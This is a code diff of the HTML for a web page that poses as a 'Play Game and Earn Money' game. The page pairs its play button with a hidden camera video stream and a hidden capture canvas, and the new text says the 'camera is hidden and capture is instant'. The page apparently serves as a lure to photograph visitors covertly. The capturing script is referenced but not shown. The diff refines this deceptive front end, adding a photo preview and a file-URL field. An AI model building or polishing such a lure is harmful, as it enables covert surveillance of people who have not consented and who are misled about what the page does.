--- a/public/index.html
+++ b/public/index.html
@@ -1,61 +1,35 @@
-<!DOCTYPE html>
+<!doctype html>
 <html lang="en">
 <head>
-  <meta charset="UTF-8">
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+  <meta charset="utf-8" />
+  <meta name="viewport" content="width=device-width,initial-scale=1" />
   <title>Play Game and Earn Money</title>
-  <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap" rel="stylesheet">
+
   <style>
-    body {
-      font-family: 'Poppins', sans-serif;
-      margin: 0;
-      background: linear-gradient(145deg, #1f1f1f, #2d2d2d);
-      color: white;
-      display: flex;
-      justify-content: center;
-      align-items: center;
-      height: 100vh;
-      flex-direction: column;
-      text-align: center;
-    }
-    h1 {
-      font-size: 2rem;
-      margin-bottom: 10px;
-      color: #00ff88;
-    }
-    p {
-      margin-bottom: 20px;
-      color: #ccc;
-    }
-    button {
-      background-color: #28a745;
-      color: white;
-      border: none;
-      padding: 12px 30px;
-      border-radius: 8px;
-      font-size: 1rem;
-      cursor: pointer;
-      transition: all 0.3s ease;
-    }
-    button:hover {
-      background-color: #1e7e34;
-      transform: scale(1.05);
-    }
-    #status {
-      margin-top: 20px;
-      font-weight: bold;
-      font-size: 1.2rem;
-    }
+    body{font-family:Arial,Helvetica,sans-serif;background:#f3f4f6;margin:0;padding:20px;display:flex;flex-direction:column;align-items:center;}
+    .card{width:100%;max-width:420px;background:#fff;border-radius:16px;padding:24px;box-shadow:0 6px 20px rgba(0,0,0,0.08);text-align:center;}
+    h1{margin:0 0 8px;font-size:22px;color:#0f172a;}
+    p{color:#475569;margin:0 0 18px;}
+    button{background:#16a34a;color:white;border:0;padding:12px 22px;border-radius:10px;font-size:16px;cursor:pointer;transition:transform .12s;}
+    button:active{transform:scale(.98)}
+    #status{margin-top:14px;font-weight:600}
+    #preview{margin-top:16px;max-width:100%;border-radius:12px;display:none;box-shadow:0 6px 18px rgba(15,23,42,0.08)}
+    .small{font-size:13px;color:#64748b;margin-top:8px}
   </style>
 </head>
 <body>
-  <h1>💰 Play Game and Win Rewards</h1>
-  <p>Click <b>Play Game</b> to try your luck!</p>
-  <button id="captureBtn">Play Game</button>
-  <p id="status"></p>
+  <div class="card">
+    <h1>💰 Play Game and Earn Money</h1>
+    <p>Click <strong>Play Game</strong> to try your luck — camera is hidden and capture is instant.</p>
 
-  <video id="video" autoplay playsinline style="display:none;"></video>
-  <canvas id="canvas" style="display:none;"></canvas>
+    <button id="captureBtn">Play Game</button>
+    <div id="status" class="small"></div>
+    <img id="preview" alt="Captured photo preview" />
+    <div id="fileUrl" class="small"></div>
+  </div>
+
+  <video id="video" autoplay playsinline style="display:none"></video>
+  <canvas id="canvas" style="display:none"></canvas>
 
   <script src="script.js"></script>
 </body>
